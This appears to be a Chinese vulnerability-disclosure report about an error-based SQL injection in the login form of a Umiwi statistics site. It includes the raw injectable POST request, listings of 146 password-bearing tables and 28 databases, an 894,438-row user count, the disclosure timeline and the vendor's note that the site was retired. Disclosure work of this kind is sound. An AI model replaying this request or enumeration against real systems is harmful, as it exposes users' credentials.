2015-01-13: 细节已通知厂商并且等待厂商处理中 2015-01-13: 厂商已经确认,细节仅向厂商公开 2015-01-23: 细节向核心白帽子及相关领域专家公开 2015-02-02: 细节向普通白帽子公开 2015-02-12: 细节向实习白帽子公开 2015-02-27: 细节向公众公开
优米网某站点MySQL报错注入(89万用户数据),可以访问大量包括用户密码的数据表。
注入点:
POST /access/login.php HTTP/1.1Content-Length: 380Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=a6db3261e08cbfeb81757f1c709d304aHost: stats.cn.umiwi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Submit=Login&login=*&password=test&remember=yes
参数login可注入。报错注射。
包括146个包括密码字段的数据表
select table_name,TABLE_SCHEMA from information_schema.columns where column_nam like '%pass%'; [146]:[*] user, angel[*] user_admin, angel[*] cdb_forumfields, bbs[*] cdb_members, bbs[*] pre_common_member, bbs[*] pre_forum_forumfield, bbs[*] pre_home_album, bbs[*] pre_home_blog, bbs[*] pre_ucenter_members, bbs[*] user, book[*] agent, callcenter[*] cmstop_dsn, cmstop[*] cmstop_member, cmstop[*] cmstop_tweets, cmstop[*] faqfaquserlogin, faq[*] card, finance_online[*] pre_common_member, forum[*] pre_common_plugin_cnzz_user, forum[*] pre_forum_forumfield, forum[*] pre_home_album, forum[*] pre_home_blog, forum[*] pre_ucenter_members, forum[*] user, mysql[*] uc_members, passport[*] user, passport[*] supe_members, supersite[*] supe_spaceitems, supersite[*] uc_m_bak, ucenter[*] uc_members, ucenter[*] admin, umiwi[*] user, umiwi[*] user_view, umiwi[*] user, umv[*] user_0, userengine[*] user_1, userengine[*] user_10, userengine[*] user_11, userengine[*] user_12, userengine[*] user_13, userengine[*] user_14, userengine[*] user_15, userengine[*] user_16, userengine[*] user_17, userengine[*] user_18, userengine[*] user_19, userengine[*] user_2, userengine[*] user_20, userengine[*] user_21, userengine[*] user_22, userengine[*] user_23, userengine[*] user_24, userengine[*] user_25, userengine[*] user_26, userengine[*] user_27, userengine[*] user_28, userengine[*] user_29, userengine[*] user_3, userengine[*] user_30, userengine[*] user_31, userengine[*] user_32, userengine[*] user_33, userengine[*] user_34, userengine[*] user_35, userengine[*] user_36, userengine[*] user_37, userengine[*] user_38, userengine[*] user_39, userengine[*] user_4, userengine[*] user_40, userengine[*] user_41, userengine[*] user_42, userengine[*] user_43, userengine[*] user_44, userengine[*] user_45, userengine[*] user_46, userengine[*] user_47, userengine[*] user_48, userengine[*] user_49, userengine[*] user_5, userengine[*] user_50, userengine[*] user_51, userengine[*] user_52, userengine[*] user_53, userengine[*] user_54, userengine[*] user_55, userengine[*] user_56, userengine[*] user_57, userengine[*] user_58, userengine[*] user_59, userengine[*] user_6, userengine[*] user_60, userengine[*] user_61, userengine[*] user_62, userengine[*] user_63, userengine[*] user_64, userengine[*] user_65, userengine[*] user_66, userengine[*] user_67, userengine[*] user_68, userengine[*] user_69, userengine[*] user_7, userengine[*] user_70, userengine[*] user_71, userengine[*] user_72, userengine[*] user_73, userengine[*] user_74, userengine[*] user_75, userengine[*] user_76, userengine[*] user_77, userengine[*] user_78, userengine[*] user_79, userengine[*] user_8, userengine[*] user_80, userengine[*] user_81, userengine[*] user_82, userengine[*] user_83, userengine[*] user_84, userengine[*] user_85, userengine[*] user_86, userengine[*] user_87, userengine[*] user_88, userengine[*] user_89, userengine[*] user_9, userengine[*] user_90, userengine[*] user_91, userengine[*] user_92, userengine[*] user_93, userengine[*] user_94, userengine[*] user_95, userengine[*] user_96, userengine[*] user_97, userengine[*] user_98, userengine[*] user_99, userengine[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] game, v_online[*] tutorpoint, v_online
其中一个user表有89万数据, 包括密文:
Database: umiwi+--------+---------+| Table | Entries |+--------+---------+| `user` | 894438 |+--------+---------+
userengine分了100个表,也可证实用户在98万左右。数据表:
available databases [28]:[*] angel[*] apns[*] bbs[*] bbs1[*] book[*] callcenter[*] celebrity[*] ceshi[*] chuangxin[*] cmstop[*] dataanalysis[*] faq[*] finance_online[*] forum[*] information_schema[*] ipadapns[*] logdb[*] mysql[*] passport[*] rating[*] stats[*] supersite[*] ucenter[*] umiwi[*] umv[*] userengine[*] v_online[*] weibo
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-01-13 16:30
感谢您的检测,此站点是已经废弃的一个站点,已经关掉此站点
暂无
没有脚本不开心
报错注入不需要脚本
洞主可是在爱奇异上班的?
来看小川了。
李姐姐是我的偶像